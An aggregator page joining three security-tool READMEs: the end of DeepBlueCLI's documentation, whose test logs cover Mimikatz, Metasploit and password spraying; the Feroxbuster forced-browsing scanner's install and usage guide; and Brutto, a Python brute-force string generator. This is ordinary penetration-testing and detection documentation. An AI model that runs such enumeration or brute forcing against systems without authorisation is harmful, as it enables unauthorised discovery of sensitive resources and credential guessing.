Event log manipulation.\DeepBlue.ps1 .\evtx\disablestop-eventlog.evtx
Metasploit native target (security).\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx
Metasploit native target (system).\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-system.evtx
Metasploit PowerShell target (security) .\DeepBlue.ps1 .\evtx\metasploit-psexec-powershell-target-security.evtx
Metasploit PowerShell target (system) .\DeepBlue.ps1 .\evtx\metasploit-psexec-powershell-target-system.evtx
Mimikatz lsadump::sam.\DeepBlue.ps1 .\evtx\mimikatz-privesc-hashdump.evtx
New user creation.\DeepBlue.ps1 .\evtx\new-user-security.evtx
Obfuscation (encoding).\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-encoding-menu.evtx
Obfuscation (string).\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-string-menu.evtx
Password guessing.\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
Password spraying.\DeepBlue.ps1 .\evtx\password-spray.evtx
PowerSploit (security).\DeepBlue.ps1 .\evtx\powersploit-security.evtx
PowerSploit (system).\DeepBlue.ps1 .\evtx\powersploit-system.evtx
PSAttack.\DeepBlue.ps1 .\evtx\psattack-security.evtx
User added to administrator group.\DeepBlue.ps1 .\evtx\new-user-security.evtx

Output

DeepBlueCLI outputs in PowerShell objects, allowing a variety of output methods and types, including JSON, HTML, CSV, etc.

For example:

Output TypeSyntax
CSV.\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Csv
Format list (default).\DeepBlue.ps1 .\evtx\psattack-security.evtx | Format-List
Format table.\DeepBlue.ps1 .\evtx\psattack-security.evtx | Format-Table
GridView.\DeepBlue.ps1 .\evtx\psattack-security.evtx | Out-GridView
HTML.\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Html
JSON.\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Json
XML.\DeepBlue.ps1 .\evtx\psattack-security.evtx | ConvertTo-Xml

Logging setup

Security event 4688 (Command line auditing):

Enable Windows command-line auditing: https://support.microsoft.com/en-us/kb/3004375


Security event 4625 (Failed logons):

Requires auditing logon failures: https://technet.microsoft.com/en-us/library/cc976395.aspx


PowerShell auditing (PowerShell 5.0):

DeepBlueCLI uses module logging (PowerShell event 4103) and script block logging (4104). It does not use transcription.

See: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

To get the PowerShell commandline (and not just script block) on Windows 7 through Windows 8.1, add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1

$LogCommandHealthEvent = $true
$LogCommandLifecycleEvent = $true

See the following for more information:

Thank you: @heinzarelli and @HackerHurricane


Sysmon

Install Sysmon from Sysinternals: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

DeepBlue and DeepWhite currently use Sysmon events, 1, 6 and 7.

Log SHA256 hashes. Others are fine; DeepBlueCLI will use SHA256.



Feroxbuster - A Fast, Simple, Recursive Content Discovery Tool Written In Rust

$
0
0


What the heck is a ferox anyway?

Ferox is short for Ferric Oxide. Ferric Oxide, simply put, is rust. The name rustbuster was taken, so I decided on a variation.


What's it do tho?

feroxbuster is a tool designed to perform Forced Browsing.

Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...

This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.

Installation


Download a Release

Releases for multiple architectures can be found in the Releases section. The latest release for each of the following systems can be downloaded and executed as shown below.


Linux x86
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86-linux-feroxbuster.zip
unzip x86-linux-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

Linux x86_64
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-linux-feroxbuster.zip
unzip x86_64-linux-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

MacOS x86_64
curl -sLO https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-macos-feroxbuster.zip
unzip x86_64-macos-feroxbuster.zip
chmod +x ./feroxbuster
./feroxbuster -V

Windows x86
https://github.com/epi052/feroxbuster/releases/latest/download/x86-windows-feroxbuster.exe.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Windows x86_64
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Homebrew on MacOS and Linux

Installable by Homebrew throughout own formulas:

MacOS
brew tap tgotwig/feroxbuster
brew install feroxbuster

Linux
brew tap tgotwig/linux-feroxbuster
brew install feroxbuster

Cargo Install

feroxbuster is published on crates.io, making it easy to install if you already have rust installed on your system.

cargo install feroxbuster

apt Install

Download feroxbuster_amd64.deb from the Releases section. After that, use your favorite package manager to install the .deb.

wget -sLO https://github.com/epi052/feroxbuster/releases/latest/download/feroxbuster_amd64.deb.zip
unzip feroxbuster_amd64.deb.zip
sudo apt install ./feroxbuster_amd64.deb

AUR Install

Install feroxbuster-git on Arch Linux with your AUR helper of choice:

yay -S feroxbuster-git

Docker Install

The following steps assume you have docker installed / setup

First, clone the repository.

git clone https://github.com/epi052/feroxbuster.git
cd feroxbuster

Next, build the image.

sudo docker build -t feroxbuster .

After that, you should be able to use docker run to perform scans with feroxbuster.


Basic usage
sudo docker run --init -it feroxbuster -u http://example.com -x js,html

Piping from stdin and proxying all requests through socks5 proxy
cat targets.txt | sudo docker run --net=host --init -i feroxbuster --stdin -x js,html --proxy socks5://127.0.0.1:9050

Mount a volume to pass in ferox-config.toml

You've got some options available if you want to pass in a config file. ferox-buster.toml can live in multiple locations and still be valid, so it's up to you how you'd like to pass it in. Below are a few valid examples:

sudo docker run --init -v $(pwd)/ferox-config.toml:/etc/feroxbuster/ferox-config.toml -it feroxbuster -u http://example.com
sudo docker run --init -v ~/.config/feroxbuster:/root/.config/feroxbuster -it feroxbuster -u http://example.com

Note: If you are on a SELinux enforced system, you will need to pass the :Z attribute also.

docker run --init -v (pwd)/ferox-config.toml:/etc/feroxbuster/ferox-config.toml:Z -it feroxbuster -u http://example.com

Define an alias for simplicity
alias feroxbuster="sudo docker run --init -v ~/.config/feroxbuster:/root/.config/feroxbuster -i feroxbuster"

Configuration

Default Values

Configuration begins with with the following built-in default values baked into the binary:

  • timeout: 7 seconds
  • follow redirects: false
  • wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
  • threads: 50
  • verbosity: 0 (no logging enabled)
  • statuscodes: 200 204 301 302 307 308 401 403 405
  • useragent: feroxbuster/VERSION
  • recursion depth: 4
  • auto-filter wildcards - true
  • output: stdout

ferox-config.toml

After setting built-in default values, any values defined in a ferox-config.toml config file will override the built-in defaults.

feroxbuster searches for ferox-config.toml in the following locations (in the order shown):

  • /etc/feroxbuster/ (global)
  • CONFIG_DIR/ferxobuster/ (per-user)
  • The same directory as the feroxbuster executable (per-user)
  • The user's current working directory (per-target)

CONFIG_DIR is defined as the following:

  • Linux: $XDG_CONFIG_HOME or $HOME/.config i.e. /home/bob/.config
  • MacOs: $HOME/Library/Application Support i.e. /Users/bob/Library/Application Support
  • Windows: {FOLDERID_RoamingAppData} i.e. C:\Users\Bob\AppData\Roaming

If more than one valid configuration file is found, each one overwrites the values found previously.

If no configuration file is found, nothing happens at this stage.

As an example, let's say that we prefer to use a different wordlist as our default when scanning; we can set the wordlist value in the config file to override the baked-in default.

Notes of interest:

  • it's ok to only specify values you want to change without specifying anything else
  • variable names in ferox-config.toml must match their command-line counterpart
# ferox-config.toml

wordlist = "/wordlists/jhaddix/all.txt"

A pre-made configuration file with examples of all available settings can be found in ferox-config.toml.example.

# ferox-config.toml
# Example configuration for feroxbuster
#
# If you wish to provide persistent settings to feroxbuster, rename this file to ferox-config.toml and make sure
# it resides in the same directory as the feroxbuster binary.
#
# After that, uncomment any line to override the default value provided by the binary itself.
#
# Any setting used here can be overridden by the corresponding command line option/argument
#
# wordlist = "/wordlists/jhaddix/all.txt"
# statuscodes = [200, 500]
# threads = 1
# timeout = 5
# proxy = "http://127.0.0.1:8080"
# verbosity = 1
# quiet = true
# output = "/targets/ellingson_mineral_company/gibson.txt"
# useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
# redirects = true
# insecure = true
# extensions = ["php", "html"]
# norecursion = true
# addslash = true
# stdin = true
# dontfilter = true
# depth = 1
# sizefilters = [5174]
# queries = [["name","value"], ["rick", "astley"]]

# headers can be specified on multiple lines or as an inline table
#
# inline example
# headers = {"stuff" = "things"}
#
# multi-line example
# note: if multi-line is used, all key/value pairs under it belong to the headers table until the next table
# is found or the end of the file is reached
#
# [headers]
# stuff = "things"
# more = "headers"

Command Line Parsing

Finally, after parsing the available config file, any options/arguments given on the commandline will override any values that were set as a built-in or config-file value.

USAGE:
feroxbuster [FLAGS] [OPTIONS] --url <URL>...

FLAGS:
-f, --addslash Append / to each request
-D, --dontfilter Don't auto-filter wildcard responses
-h, --help Prints help information
-k, --insecure Disables TLS certificate validation
-n, --norecursion Do not scan recursively
-q, --quiet Only print URLs; Don't print status codes, response size, running config, etc...
-r, --redirects Follow redirects
--stdin Read url(s) from STDIN
-V, --version Prints version information
-v, --verbosity Increase verbosity level (use -vv or more for greater effect)

OPTIONS:
-d, --depth <RECURSION_DEPTH> Maximum recursion depth, a depth of 0 is infinite recursion (default: 4)
-x, --extensions <FILE_EXTENSION>... File extension(s) to search for (ex: -x php -x pdf js)
-H, --headers <HEADER>... Specify HTTP headers (ex: -H Header:val 'stuff: things')
-o, --output <FILE> Output file to write results to (default: stdout)
-p, --proxy <PROXY> Proxy to use for requests (ex: http(s)://host:port, socks5://host:port)
-Q, --query <QUERY>... Specify URL query parameters (ex: -Q token=stuff -Q secret=key)
-S, --sizefilter <SIZE>... Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-s, --statuscodes <STATUS_CODE>... Status Codes of interest (default: 200 204 301 302 307 308 401 403 405)
-t, --threads <THREADS> Number of concurrent threads (default: 50)
-T, --timeout <SECONDS> Number of seconds before a request times out (default: 7)
-u, --url <URL>... The target URL(s) (required, unl ess --stdin used)
-a, --useragent <USER_AGENT> Sets the User-Agent (default: feroxbuster/VERSION)
-w, --wordlist <FILE> Path to the wordlist

Example Usage

Multiple Values

Options that take multiple values are very flexible. Consider the following ways of specifying extensions:

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

The command above adds .pdf, .js, .html, .php, .txt, .json, and .docx to each url

All of the methods above (multiple flags, space separated, comma separated, etc...) are valid and interchangeable. The same goes for urls, headers, status codes, queries, and size filters.


Include Headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

IPv6, non-recursive scan with INFO-level logging enabled
./feroxbuster -u http://[::1] --norecursion -vv

Read urls from STDIN; pipe only resulting urls out to another tool
cat targets | ./feroxbuster --stdin --quiet -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy traffic through Burp
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

Proxy traffic through a SOCKS proxy
./feroxbuster -u http://127.1 --proxy socks5://127.0.0.1:9050

Pass auth token via query parameter
./feroxbuster -u http://127.1 --query token=0123456789ABCDEF

Comparison w/ Similar Tools

There are quite a few similar tools for forced browsing/content discovery. Burp Suite Pro, Dirb, Dirbuster, etc... However, in my opinion, there are two that set the standard: gobuster and ffuf. Both are mature, feature-rich, and all-around incredible tools to use.

So, why would you ever want to use feroxbuster over ffuf/gobuster? In most cases, you probably won't. ffuf in particular can do the vast majority of things that feroxbuster can, while still offering boatloads more functionality. Here are a few of the use-cases in which feroxbuster may be a better fit:

  • You want a simple tool usage experience
  • You want to be able to run your content discovery as part of some crazy 12 command unix pipeline extravaganza
  • You want to scan through a SOCKS proxy
  • You want auto-filtering of Wildcard responses by default
  • You want recursion along with some other thing mentioned above (ffuf also does recursion)
  • You want a configuration file option for overriding built-in default values for your scans
feroxbustergobusterffuf
fast
easy to use
blacklist status codes (in addition to whitelist)
allows recursion
can specify query parameters
SOCKS proxy support
multiple target scan (via stdin or multiple -u)
configuration file for default value override
can accept urls via STDIN as part of a pipeline
can accept wordlists via STDIN
filter by response size
auto-filter wildcard responses
performs other scans (vhost, dns, etc)
time delay / rate limiting
huge number of other options

Of note, there's another written-in-rust content discovery tool, rustbuster. I came across rustbuster when I was naming my tool (

). I don't have any experience using it, but it appears to be able to do POST requests with an HTTP body, has SOCKS support, and has an 8.3 shortname scanner (in addition to vhost dns, directory, etc...). In short, it definitely looks interesting and may be what you're looking for as it has some capability I haven't seen in similar tools.

Brutto - Easy Brute Forcing To Whatever You Want

$
0
0


Easy brute forcing to whatever you want, Its magic increasing values and direct.


Implementation
# So you import the library
from brutto_easy import Brutto

How to use
  • Includes all the letters (A - Z ) in case sensitive.
  • All numbers are reflected in the process ( 0-9 )
  • Also all the symbols and space.

Settings
  • scope
  • letters
  • numbers
  • symbols
  • space

Base
  • increase
  • direct

Default settings test with (increase)
# call brutto
test = Brutto()

# Here I implement
for example in test.increase(letters=True, numbers=True, symbols=False, space=False, scope=4):
print example

Default settings test with (direct)
# call brutto
bruteforce = Brutto()

for example in bruteforce.direct(4):
print example

So you add a custom value to increase letters. scope=(1-5)

# call brutto
test = Brutto()

for example in test.increase(letters=True, scope=5):
print example

With letters and numbers, and increased scope=(1-8 )

# call brutto
test = Brutto()

for example in test.increase(scope=8, letters=True, numbers=True, symbols=False):
print example


Copyright, 2015 by Jose Pino



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>